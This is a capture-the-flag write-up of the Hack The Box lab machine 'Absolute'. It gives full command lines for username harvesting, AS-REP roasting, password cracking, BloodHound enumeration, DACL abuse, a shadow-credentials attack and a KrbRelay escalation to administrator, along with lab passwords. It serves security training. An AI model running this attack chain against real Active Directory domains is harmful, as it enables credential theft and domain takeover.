# Absolute HTB

Using autorecon to enumerate:

```
# Nmap 7.94SVN scan initiated Tue Feb 20 17:52:22 2024 as: nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN /home/kali/Downloads/absolute/results/10.10.11.181/scans/_full_tcp_nmap.txt -oX /home/kali/Downloads/absolute/results/10.10.11.181/scans/xml/_full_tcp_nmap.xml 10.10.11.181
Increasing send delay for 10.10.11.181 from 0 to 5 due to 91 out of 227 dropped probes since last increase.
Warning: 10.10.11.181 giving up on port because retransmission cap hit (6).
Nmap scan report for 10.10.11.181
Host is up, received user-set (0.046s latency).
Scanned at 2024-02-20 17:52:22 IST for 625s
Not shown: 65500 closed tcp ports (reset)
PORT      STATE    SERVICE       REASON                              VERSION
80/tcp    open     http          syn-ack ttl 127                     Microsoft IIS httpd 10.0
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-title: Absolute
|_http-server-header: Microsoft-IIS/10.0
88/tcp    open     kerberos-sec  syn-ack ttl 127                     Microsoft Windows Kerberos (server time: 2024-02-20 19:31:13Z)
135/tcp   open     msrpc         syn-ack ttl 127                     Microsoft Windows RPC
389/tcp   open     ldap          syn-ack ttl 127                     Microsoft Windows Active Directory LDAP (Domain: absolute.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.absolute.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.absolute.htb
| Issuer: commonName=absolute-DC-CA/domainComponent=absolute
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2023-07-17T21:11:52
| Not valid after:  2024-07-16T21:11:52
| MD5:   8355:ce67:4d7e:e8ab:e5d1:ec4c:8482:550b
| SHA-1: c9cb:a13e:be47:d989:40d5:92e2:b9ef:cfff:9ef4:53e5
|_ssl-date: 2024-02-20T19:32:46+00:00; +7h00m00s from scanner time.
445/tcp   open     microsoft-ds? syn-ack ttl 127
464/tcp   open     kpasswd5?     syn-ack ttl 127
593/tcp   open     ncacn_http    syn-ack ttl 127                     Microsoft Windows RPC over HTTP 1.0
636/tcp   open     ssl/ldap      syn-ack ttl 127                     Microsoft Windows Active Directory LDAP (Domain: absolute.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.absolute.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.absolute.htb
| Issuer: commonName=absolute-DC-CA/domainComponent=absolute
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2023-07-17T21:11:52
| Not valid after:  2024-07-16T21:11:52
| MD5:   8355:ce67:4d7e:e8ab:e5d1:ec4c:8482:550b
| SHA-1: 
|_ssl-date: 2024-02-20T19:32:47+00:00; +7h00m00s from scanner time.
689/tcp   filtered nmap          no-response
3269/tcp  open     ssl/ldap      syn-ack ttl 127                     Microsoft Windows Active Directory LDAP (Domain: absolute.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-02-20T19:32:46+00:00; +7h00m00s from scanner time.
| ssl-cert: Subject: commonName=dc.absolute.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.absolute.htb
| Issuer: commonName=absolute-DC-CA/domainComponent=absolute
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2023-07-17T21:11:52
| Not valid after:  2024-07-16T21:11:52
| MD5:   8355:ce67:4d7e:e8ab:e5d1:ec4c:8482:550b
| SHA-1: c9cb:a13e:be47:d989:40d5:92e2:b9ef:cfff:9ef4:53e5

Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=260 (Good luck!)
IP ID Sequence Generation: Busy server or unknown class
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 64848/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 16687/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 58099/udp): CLEAN (Failed to receive data)
|   Check 4 (port 41463/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
|_clock-skew: mean: 6h59m59s, deviation: 0s, median: 6h59m59s
| smb2-time: 
|   date: 2024-02-20T19:32:40
|_  start_date: N/A

TRACEROUTE (using port 7847/tcp)
HOP RTT      ADDRESS
1   43.93 ms 10.10.14.1
2   44.01 ms 10.10.11.181

Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Feb 20 18:02:47 2024 -- 1 IP address (1 host up) scanned in 625.40 seconds

```

adding the hostname to /etc/hosts for *DNS Resolution*: ![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-a741f6e4e91752b70f2921f9230a307ad697472a%2F700cf9eea9cbf2a38409029650d86126.png?alt=media) A webpage is running on port 80: ![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-797d9e4868a8387d960a98a2d017ebc8bec5466f%2Ff05a8dca9f117e443a9f103b73de0db2.png?alt=media) Now downloading all the images in the repository: `wget -r 10.10.11.181` Using exiftool for metadata: `exiftool hero_1.jpg` The authors are listed in the metadata so to get all the authors: `find . -type f -exec exiftool {} \; | grep Author` ![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-fd8b57f8edf6c590a004b73450257e3e3e7aa4e5%2Ffdd8755f0cabc5dc8d0588fa52977f29.png?alt=media) Now to list only authors: `find . -type f -exec exiftool {} \; | grep Author|awk -F: '{print $2}'| sed 's/^ //g' > username.txt` Now using anarchy <https://github.com/urbanadventurer/username-anarchy> Now fixing the usernames according to the example format: ![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-67e5ea5f2da66ff5456a3e1ba9a47b5561efa792%2F9376b786fbd026320f024f4329a1d3be.png?alt=media) `ruby username-anarchy/username-anarchy -i username.txt -f flast,f.last,first.last,last.first` ![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-90c68a78be40e921bf1e65566e961e588ef2a6f9%2Faaeeb8b6f8d0c9b35ac8e241d66cb4ee.png?alt=media)

## Exploitation

### ASREPRoast

Now to brute force using kerbrute (or impacket GetNPUser) <https://github.com/ropnop/kerbrute> `./kerbrute_linux_amd64 userenum --dc dc.absolute.htb -d absolute.htb username.txt -o valid-users.txt` ![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-7fae9e23eb35754d6a661aa34176ab9699251914%2F0cc399d61eaf1d541c9ae9435a29daf4.png?alt=media) `cat valid-users.txt |grep USERNAME|awk '{print $7}' > tmp` `mv tmp valid-users.txt` Now to change time to domain controller time: `sudo ntpdate dc.absolute.htb`

Use latest kerbrute for hashes. git clone and `go build` Now we get a hash running it again: ![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-83b8f474434674f46de6b4c46076bfb7fc3367cd%2F389af08fcd2eac1609e32f0f4c1fb623.png?alt=media) Now use the hash to crack on hashcat but its the wrong type of `kerberos 5 etype 23` by auto. So we gotta --downgrade with kerbrute: `./kerb userenum --dc dc.absolute.htb -d absolute.htb username.txt --downgrade`![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-b14102d43bbd8b9a91b403541eb3be538131b018%2F0f1a2eb7f0170163479f8b179e00f58a.png?alt=media) THIS IS etype 23 (can tell from the first line) Password: <d.klay@absolute.htb>: `Darkmoonsky248girl` Validate with *crackmapexec* `cme smb 10.10.11.181 -u d.klay -p Darkmoonsky248girl` ![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-3710d7c843c12062a0d3c2ad34530d7978e0a1f3%2Fdb30272b9288cb9961e6b17b1f8d0f66.png?alt=media) First get ticket with impacket: `getTGT.py absolute.htb/d.klay` Now using bloodhound: `KRB5CCNAME=d.klay.ccache ./bloodhound.py -k -dc dc.absolute.htb -ns 10.10.11.181 -c All -d absolute.htb -u d.klay@absolute.htb` but use bloodhound from <https://github.com/jazzpizazz/BloodHound.py-Kerberos> for kerberos support. ![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-98bdfa7454e3c2bda21b5cafcf8109255821bc4f%2F3c5e8da9b54ada714431f65b04042637.png?alt=media) Marking everyone under winrm\_user as high value as we can get a shell. ![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-4954c8fcdc6b7c27cdbb65fefcb08f7429377a46%2F0dc2afceaa0ace460dd68b60d30791ec.png?alt=media) Marking everyone under domain users as high value too.

Using kerberos login to enumerate smb: `cme smb 10.10.11.181 -u d.klay -p Darkmoonsky248girl -k --shares` ![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-dd8c800bb6c9d363b83f28829a7ef471b3c1a45d%2Fb61b42470459082112277374690b96bb.png?alt=media) We have password for svc\_smb in bloodhound: ![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-af29f72620644045b1de206519b1739f77059930%2F69ee3e1d3a5aa2ce3e533f162d62be58.png?alt=media) To get it manually: `cat 20240302180235_users.json | jq '.data[].Properties | .samaccountname + ":" + .description' -r` ![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-d1dfde3c102104c86fcb11e7ccfaceda9604832b%2Fbeb77b512ed0a9ec4277a49553bf52b1.png?alt=media)Now checking smb shares: ![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-c6e1081d6eb436356ef400b367910c45f350e7aa%2F1f8d6c97c9f77b8bd90ba97860741d2c.png?alt=media) To do the same enumeration with ldapsearch instead of bloodhound. First initialise the kerberos client in /etc/krb5.conf then use `kinit` to initialize ![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-ed2ccf03279ed26f12b736a6f60177f59587c2a5%2F98ee6344d0ff3546d23cd14383d2b2cd.png?alt=media) `ldapsearch -H ldap://dc.absolute.htb -s base -Y GSSAPI -b "cn=users,dc=absolute,dc=htb" "user" "description"` Now get TGT using: `getTGT.py absolute.htb/svc_smb` Then use smbclient for kerberos login: `KRB5CCNAME=svc_smb.ccache ./smbclient.py -k absolute.htb/svc_smb@dc.absolute.htb -target-ip 10.10.11.181`

We find test.exe in the smb Now trying it in windows vm we need to port forward with

```
sudo iptables -A FORWARD -i tun0 -o eth0 -m state --state RELATED,ESTABLISHED -j ACCEPT
                                                    sudo iptables -A FORWARD -i eth0 -o tun0  -j ACCEPT                                    
sudo iptables -t nat -A POSTROUTING -s 192.168.161.0/24 -o tun0 -j MASQUERADE   
```

Then in windows: `route add 10.10.10.0/23 mask 255.255.254.0 192.168.58.230` Then add dns Then running test.exe and using wireshark to sniff: ![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-b5db6f8750b7008d13cc09ae3108274622dda469%2F752b2bb8fc46a4e92e53ec979d5840b8.png?alt=media) Now follow TCP Stream: ![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-676e1a6879ac3375864cba74e16a66e150c368e7%2Fb5ad91b33697f5eaee812112fc23ab12.png?alt=media) We get the creds for a user m.lovegod AbsoluteLDAP2022! Marking as owned in bloodhound we can see the "transitive object control" for m.lovegods ![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-ff1d141375912510faf130f76cfd52d9817ea184%2F27fcbdc222d774fe93121d9121aa289e.png?alt=media) Now to add ourselves to NETWORK AUDIT Get dacledit.py from the repo <https://github.com/ShutdownRepo/impacket.git> `python3 -m venv .venv source .venv/bin/activate` `pip install .`

Now get the TGT for m.lovegod

```
getTGT.py absolute.htb/m.lovegod
```

Then

```
KRB5CCNAME=/home/kali/Downloads/absolute/m.lovegod.ccache ./dacledit.py -k -no-pass -dc-ip 10.10.11.181 -principal m.lovegod -target "Network Audit" -action write -rights FullControl absolute.htb/m.lovegod 
```

Then do `kinit m.lovegod` to add creds. Then edit /etc/krb5.conf ![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-73658bf2c9ba46bde3517bfe7041899cf4f5d83f%2F298497c54fdc5e0c9d92c591d5dfe53e.png?alt=media) `net rpc group addmem "Network Audit" -k -U m.lovegod -S dc.absolute.htb m.lovegod` To add the member

Now checking `net rpc group members "Network Audit" -k -U m.lovegod -S dc.absolute.htb` ![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-f9137cc9cd85bc91302c015e384b8b12defd75c5%2Fa0c7a9c723b814868537129831db500e.png?alt=media) Bloodhound suggests to use pywhisker But using certipy instead for Shadow credential attack `KRB5CCNAME=m.lovegod.ccache certipy shadow auto -k -no-pass -u absolute.htb/m.lovegod@dc.absolute.htb -dc-ip 10.10.11.181 -target dc.absolute.htb -account winrm_user`

Then to get shell in winrm: `KRB5CCNAME=winrm_user.ccache evil-winrm -r absolute.htb -i dc.absolute.htb` ![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-deef9bdd9f2ee964665e7b4aaa0eaf73c3d2882a%2F0a5c466b5a0c1f34136d093c34e52ccc.png?alt=media) Now uploading [KrbRelay.exe](https://github.com/cube0x0/KrbRelay) to the machine we try the command: `.\KrbRelay.exe -spn ldap/dc.absolute.htb -clsid 354ff91b-5e49-4bdc-a8e6-1cb6c6877182 -add-groupmember "Domain Admins" winrm_user` For a krbrelay attack but we get an error![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-7ba6d32acb4d38d7ab740ebdeb205d66f2bfd5d8%2F271990e7aa4ff1e5c628342e45e54045.png?alt=media)

***

**NOTE**: BEFORE USING RUNAS CHECK THAT THE WHOLE COMMAND IS IN '' AND THE ARGUMENT INSIDE IS IN "". TRY USING TRUSTEDINSTALLER CLSID IF ERROR.

***

It is a credential issue so using [RunasCs.exe](https://github.com/antonioCoco/RunasCs) Now `.\RunasCs.exe -l -h` for help: ![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-43a3e2faf595dcc9eb41c5a68b79a40c602dd983%2F9471e4396cc0ed4b94f00f3837a7791b.png?alt=media) But still the same error with `.\RunasCs.exe m.lovegod -l 9 -d absolute.htb AbsoluteLDAP2022! "KrbRelay2.exe -spn ldap/dc.absolute.htb -clsid 354ff91b-5e49-4bdc-a8e6-1cb6c6877182 -add-groupmember 'Domain Admins' winrm_user"`

Changing the clsid: `.\RunasCs.exe m.lovegod -l 9 -d absolute.htb AbsoluteLDAP2022! "KrbRelay2.exe -spn ldap/dc.absolute.htb -clsid 0289a7c5-91bf-4547-81ae-fec91a89dec5 # RPC_C_IMP_LEVEL_IMPERSONATE -Port 10 -add-groupmember 'Domain Admins' winrm_user"` We get a different error: ![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-62562395212eccbefd5ef06e70f071e34d491127%2Fd5c4e1e1e8cc0bdab633281ca86ee2c1.png?alt=media) The clsid is a problem so getting it from [Juicy Potato](https://github.com/ohpe/juicy-potato/tree/master/CLSID/Windows_Server_2016_Standard) from trustedInstaller as it always runs as system. But the same godamn error. `.\RunasCs.exe m.lovegod -l 9 -d absolute.htb AbsoluteLDAP2022! "KrbRelay2.exe -spn ldap/dc.absolute.htb -clsid 8F5DF053-3013-4dd8-B5F4-88214E81C0CF -Port 10 -add-groupmember Administrators winrm_user"` Removing the quotes solved the issue - \_ - Checking now with `net group administrators` ![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-741d703c51ee0178b12311721270282ab35eaaa6%2Fcbce24f1db9bcd4b4eac0bcdac94bcd6.png?alt=media) We have been added to the administrators group